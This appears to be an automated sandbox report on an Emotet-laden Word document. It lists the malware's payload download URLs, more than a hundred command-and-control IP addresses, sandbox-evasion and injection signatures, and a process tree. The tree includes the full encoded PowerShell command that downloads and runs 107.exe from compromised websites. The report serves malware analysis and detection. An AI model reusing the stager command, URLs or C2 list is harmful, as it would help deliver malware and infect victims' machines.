Analysis
-
max time kernel
30s -
resource
win10v191014 -
submitted
18-12-2019 04:20
General
Malware Config
Extracted
http://duanchungcubatdongsan.com/wp-admin/kvv6737/
http://iamsuperkol.com/wp-admin/1gexz6/
http://demo1.alismartdropship.com/wp-content/cs9ei61/
http://driventodaypodcast.com/megaphone/t45787/
http://newdiscoverclutch.discoverclutch.com/cgi-bin/4v6/
Extracted
emotet
74.79.103.55:80
190.100.153.162:443
190.6.193.152:8080
96.126.121.64:443
104.236.137.72:8080
85.234.143.94:8080
80.85.87.122:8080
62.75.160.178:8080
71.76.45.83:443
14.160.93.230:80
87.106.77.40:7080
149.135.123.65:80
76.221.133.146:80
46.101.212.195:8080
91.83.93.124:7080
45.8.136.201:80
201.213.32.59:80
2.139.158.136:443
152.170.108.99:443
188.14.39.65:443
190.97.30.167:990
96.38.234.10:80
97.81.12.153:80
72.29.55.174:80
91.117.83.59:80
181.61.143.177:80
91.74.175.46:80
24.100.130.206:80
80.103.207.62:8080
94.200.114.162:80
2.44.167.52:80
68.129.203.162:443
37.183.121.32:80
68.183.170.114:8080
69.163.33.84:8080
46.28.111.142:7080
82.36.103.14:80
181.36.42.205:443
45.50.177.164:80
207.154.204.40:8080
190.186.164.23:80
138.68.106.4:7080
204.63.252.182:443
183.99.239.141:80
51.255.165.160:8080
5.32.41.106:80
217.199.160.224:8080
111.125.71.22:8080
116.48.148.32:80
191.103.76.34:443
188.135.15.49:80
212.71.237.140:8080
190.210.184.138:995
91.205.215.57:7080
79.7.114.1:80
159.203.204.126:8080
99.252.27.6:80
203.25.159.3:8080
2.42.173.240:80
119.59.124.163:8080
203.130.0.69:80
50.28.51.143:8080
200.123.101.90:80
118.36.70.245:80
184.184.202.167:443
5.196.35.138:7080
88.147.21.248:80
149.62.173.247:8080
223.255.148.134:80
73.167.135.180:80
63.246.252.234:80
81.157.234.90:8080
163.172.40.218:7080
181.231.62.54:80
74.59.187.94:80
112.218.134.227:80
188.216.24.204:80
200.119.11.118:443
37.120.185.153:443
91.204.163.19:8090
178.79.163.131:8080
125.99.61.162:7080
139.162.118.88:8080
109.169.86.13:8080
113.61.76.239:80
181.198.203.45:443
85.152.208.146:80
200.58.83.179:80
142.93.114.137:8080
82.196.15.205:8080
77.55.211.77:8080
45.79.95.107:443
104.131.58.132:8080
5.88.27.67:8080
142.127.57.63:8080
185.160.212.3:80
82.8.232.51:80
186.68.48.204:443
118.200.218.193:443
80.11.158.65:8080
212.237.50.61:8080
73.60.8.210:80
68.174.15.223:80
219.75.66.103:80
192.241.146.84:8080
86.42.166.147:80
96.61.113.203:80
93.67.154.252:443
186.15.83.52:8080
190.146.131.105:8080
116.48.138.115:80
87.106.46.107:8080
185.86.148.222:8080
181.135.153.203:443
190.195.129.227:8090
93.148.252.90:80
62.75.143.100:7080
200.124.225.32:80
144.139.56.105:80
68.183.190.199:8080
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4932 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4932 WINWORD.EXE 4372 107.exe 4348 107.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3020 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3020 wrote to memory of 4372 3020 Powershell.exe 80 PID 4372 wrote to memory of 4348 4372 107.exe 81 -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4932 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3020 Powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 4372 107.exe 4348 107.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 4348 107.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9d7854178437a26f14d851e786d68dcdfa005d2010b175103ccf8e1eb106b141.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4932
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABRAHkAagB1AHcAaABwAG4AdgBvAHMAdwBzAD0AJwBQAGEAcQB5AGkAagBzAHEAZwBtAGMAZwB1ACcAOwAkAEEAYQBoAHYAZgBlAHkAdgBmAHYAeQB3ACAAPQAgACcAMQAwADcAJwA7ACQARQBmAGgAYQBnAG8AdgBxAGEAZQBuAGYAcwA9ACcATQBzAHcAcQB2AGkAeQBrAG8AeQAnADsAJABIAHcAeABiAHgAZQByAGYAeABwAG4APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEAYQBoAHYAZgBlAHkAdgBmAHYAeQB3ACsAJwAuAGUAeABlACcAOwAkAEgAdABhAHYAawB1AHAAbwA9ACcARgBzAGEAZQB6AHkAZQB2AG4AeAAnADsAJABWAHIAcwBwAGEAYgB3AHkAcwBsAGMAYwB1AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAGUAVAAuAHcARQBCAGMATABpAGUAbgB0ADsAJABXAGsAbQBlAG0AZgB1AHIAbAB0AD0AJwBoAHQAdABwADoALwAvAGQAdQBhAG4AYwBoAHUAbgBnAGMAdQBiAGEAdABkAG8AbgBnAHMAYQBuAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBrAHYAdgA2ADcAMwA3AC8AKgBoAHQAdABwADoALwAvAGkAYQBtAHMAdQBwAGUAcgBrAG8AbAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AMQBnAGUAeAB6ADYALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAxAC4AYQBsAGkAcwBtAGEAcgB0AGQAcgBvAHAAcwBoAGkAcAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGMAcwA5AGUAaQA2ADEALwAqAGgAdAB0AHAAOgAvAC8AZAByAGkAdgBlAG4AdABvAGQAYQB5AHAAbwBkAGMAYQBzAHQALgBjAG8AbQAvAG0AZQBnAGEAcABoAG8AbgBlAC8AdAA0ADUANwA4ADcALwAqAGgAdAB0AHAAOgAvAC8AbgBlAHcAZABpAHMAYwBvAHYAZQByAGMAbAB1AHQAYwBoAC4AZABpAHMAYwBvAHYAZQByAGMAbAB1AHQAYwBoAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ANAB2ADYALwAnAC4AIgBzAHAAYABMAGkAVAAiACgAJwAqACcAKQA7ACQAUQBvAHgAbQBlAHEAZgB1AD0AJwBYAGwAbgB3AHoAaQBkAGsAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFgAZABtAHAAZABmAGMAagBzAHgAYgBzAGgAIABpAG4AIAAkAFcAawBtAGUAbQBmAHUAcgBsAHQAKQB7AHQAcgB5AHsAJABWAHIAcwBwAGEAYgB3AHkAcwBsAGMAYwB1AC4AIgBEAE8AdwBgAE4AbABvAGEARABgAEYASQBMAGUAIgAoACQAWABkAG0AcABkAGYAYwBqAHMAeABiAHMAaAAsACAAJABIAHcAeABiAHgAZQByAGYAeABwAG4AKQA7ACQAUgBhAG4AZABwAHIAaQBhAGcAcwBrAD0AJwBFAGQAbQB4AHgAcAB6AGkAeABzAGMAdQBvACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQASAB3AHgAYgB4AGUAcgBmAHgAcABuACkALgAiAEwAYABFAGAATgBnAHQASAAiACAALQBnAGUAIAAzADIANgA3ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGEAYABSAFQAIgAoACQASAB3AHgAYgB4AGUAcgBmAHgAcABuACkAOwAkAFYAcwBjAHYAcABsAHEAYgB0AHcAbgBpAGUAPQAnAFIAbQBuAGoAdABuAGsAZgAnADsAYgByAGUAYQBrADsAJABGAHUAaABrAGkAYgBhAGYAPQAnAEEAaQBwAGoAdABuAGwAZQBiAGMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgBzAGwAaQBiAGgAagBsAD0AJwBJAHMAagByAGkAcQBrAHYAbQBjACcA1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:3020 -
C:\Users\Admin\107.exe"C:\Users\Admin\107.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4372 -
C:\Users\Admin\107.exe--ca07d7163⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:4348
-
-